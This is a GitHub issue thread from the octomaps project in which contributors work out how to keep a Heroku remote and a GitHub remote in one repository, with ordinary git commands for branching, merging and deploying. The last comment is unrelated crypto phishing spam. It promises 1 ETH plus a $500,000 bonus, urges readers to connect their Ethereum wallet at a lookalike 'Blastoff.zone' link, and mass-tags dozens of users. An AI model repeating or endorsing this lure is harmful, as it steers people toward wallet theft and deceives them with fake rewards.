### ISSUE TITLE
heroku repo vs our github repo

### ISSUE THREAD

**Issue by meowist** [johnkferguson/octomaps#3]
I've just deployed a skeleton sinatra app to heroku (woohoo!)

http://octomaps.herokuapp.com/

one snag I can't yet figure out is that by deploying this app on heroku, heroku sets the git remote as heroku-specific:  

git@heroku.com:octomaps.git

I'd like to move this into a branch on our main project repo instead but not sure how to do that without severing the app from Heroku. Can one codebase have two remotes? Seems like that's a recipe for trouble. I think I'll figure this out, just wanted to log this issue here.

**Comment by aviflombaum** [comment]
One codebase has two remotes. The workflow is:

master -> github/origin

work off master, which points at github in a remote named origin.

branch off that, always pushing to github

merge completed into master

push master to heroku origin when you want to deploy.

Avi Flombaum
http://twitter.com/aviflombaum

**Comment by meowist** [comment]
Thanks Avi. I'm still not 100% clear on how we should be working with and pushing the Sinatra app files. Those need to go to Heroku, so a few Qs:
1. When you say "merge completed into master" above do you just mean merge to master on GitHub first, then push master to heroku to deploy?
2. To push to Heroku instead of Github, do we just do "git push heroku" from our fully merged master? 
3. Do we have to specify the remote address with git@heroku... below?

Here's a screenshot of how it's set up on heroku now (Avi please correct me if I've got anything wrong below):

Screenshot:
http://gyazo.com/f0cd8125cb5e4ab55ee43227d0e0f439

Heroku origin = 
git@heroku.com:octomaps.git

Master origin = 
git@github.com:JohnKellyFerguson/GithubMaps.git

Branch for Sinatra files:
https://github.com/JohnKellyFerguson/GithubMaps/tree/app-files

**Comment by meowist** [comment]
Quick update:

This post helped me figure out the commands for pushing to Heroku:
http://stackoverflow.com/questions/5338551/how-does-git-push-heroku-master-know-where-to-push-to-and-how-to-push-to-a-dif

But I'm stuck on how to get the Heroku and GitHub repos to be in sync. As is I'm getting out of sync errors and "no common commits." Screenshot of my terminal trail attached. Thanks!
![heroku](https://f.cloud.github.com/assets/294464/189786/c98c5360-7eac-11e2-885c-3a187e81e596.jpg)

**Comment by meowist** [comment]
I also tried git pull --rebase and that worked, but I still get the same branch tip is behind its remote error

![heroku2](https://f.cloud.github.com/assets/294464/190190/679b0570-7ed4-11e2-9672-df44b0129d8e.png)

**Comment by aviflombaum** [comment]
hey justin,

you basically ignore the heroku remote - you just push your master to that remote when you're ready to deploy.

try

git checkout master
git checkout -b new_feature
touch new_file
git add .
git commit -am "added new_file"
git checkout master
git merge new_feature
git push heroku master

that goes through working on a feature branch, merging that feature branch into master, and pushing that new feature from master to heroku. we can look at this tomorrow

**Comment by meowist** [comment]
Thanks Avi. I'm following that workflow. The prob is with the last step: the repo on heroku won't accept my push. No need for me to deploy to Heroku now, so let's take a look Monday.

**Comment by aviflombaum** [comment]
Somehow heroku remote has commits that your master from github doesn't.

git checkout master
git merge heroku/master
git push heroku master

try that

**Comment by Seryozhaj** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
werkkrew, @jackii, @nairit, @torrocus, @Sdoof, @jongan69, @border, @naezeroth, @16GMCN, @charlychiu, @MetaCorp, @dfischer, @Sumanth666, @waitingkuo, @mikkeymoo, @masipauskas, @cxumol, @patchaich, @51bitquant, @matio, @MikeGolden, @wobondar, @fer-ri, @cpretzinger, @mortyk996, @Ashad-h, @satolab12, @Saurusftw, @alexanderols, @abuyusuf1, @AnthonyBloomer, @skpolet, @jaggas, @mehrdad-shokri, @rockingbuddha, @KlukvaMors, @5oclockshadow, @HarryMtv, @minghsu98, @Alexiiv, @dahcorn, @yukifrog, @yf-chau, @Sinscerly, @gusmalkova, @deveyu, @taketaketaketake, @callistusndemo, @ExpressGit, @lvnr
